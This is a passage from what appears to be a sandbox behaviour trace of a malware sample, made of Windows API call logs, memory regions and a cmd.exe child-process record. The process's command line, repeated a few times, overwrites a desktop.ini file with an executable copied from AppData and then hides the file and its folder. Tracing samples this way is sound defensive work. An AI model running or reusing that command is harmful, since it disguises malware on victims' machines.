(_FileHandle=4) returned 0x54 [0236.148] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.149] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x32, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x32, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.150] _close (_FileHandle=4) returned 0 [0236.151] FindNextFileW (in: hFindFile=0x440e78, lpFindFileData=0x2eee2c | out: lpFindFileData=0x2eee2c) returned 0 [0236.151] GetLastError () returned 0x12 [0236.151] FindClose (in: hFindFile=0x440e78 | out: hFindFile=0x440e78) returned 1 [0236.151] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0236.152] _close (_FileHandle=3) returned 0 [0236.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.152] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.152] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.152] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.152] SetConsoleInputExeNameW () returned 0x1 [0236.152] GetConsoleOutputCP () returned 0x1b5 [0236.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.153] exit (_Code=0) Process: id = "646" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35585 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35586 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35587 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35588 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35589 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35590 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35591 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35592 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35593 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 35594 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35643 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35644 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35645 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35646 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35647 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 35648 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35649 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35650 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35651 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35652 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35653 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35654 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35655 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35656 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35657 start_va = 0xf0000 end_va = 0x1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 35658 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35659 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35660 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35661 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35662 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35663 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35664 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35665 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 35666 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 35691 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 887 os_tid = 0x600 [0236.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf80c | out: lpSystemTimeAsFileTime=0x2cf80c*(dwLowDateTime=0xc02ca120, dwHighDateTime=0x1d440a9)) [0236.081] GetCurrentProcessId () returned 0xa40 [0236.081] GetCurrentThreadId () returned 0x600 [0236.081] GetTickCount () returned 0x40cac [0236.081] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf804 | out: lpPerformanceCount=0x2cf804*=29287162102) returned 1 [0236.083] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0236.083] __set_app_type (_Type=0x1) [0236.083] __p__fmode () returned 0x76b331f4 [0236.083] __p__commode () returned 0x76b331fc [0236.083] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0236.083] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0236.084] GetCurrentThreadId () returned 0x600 [0236.084] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x600) returned 0x38 [0236.084] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.084] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.084] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.093] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf79c | out: phkResult=0x2cf79c*=0x0) returned 0x2 [0236.093] VirtualQuery (in: lpAddress=0x2cf7d3, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.094] GetConsoleOutputCP () returned 0x1b5 [0236.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.094] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0236.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.095] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.095] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.096] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.096] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.096] GetEnvironmentStringsW () returned 0x4a04a0* [0236.096] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.096] GetEnvironmentStringsW () returned 0x4a04a0* [0236.096] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce70c | out: phkResult=0x2ce70c*=0x40) returned 0x0 [0236.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x50, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x0, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegCloseKey (hKey=0x40) returned 0x0 [0236.097] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce70c | out: phkResult=0x2ce70c*=0x40) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x0, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegCloseKey (hKey=0x40) returned 0x0 [0236.097] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0236.097] srand (_Seed=0x5b8863c3) [0236.097] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" [0236.097] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" [0236.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.098] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a1c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 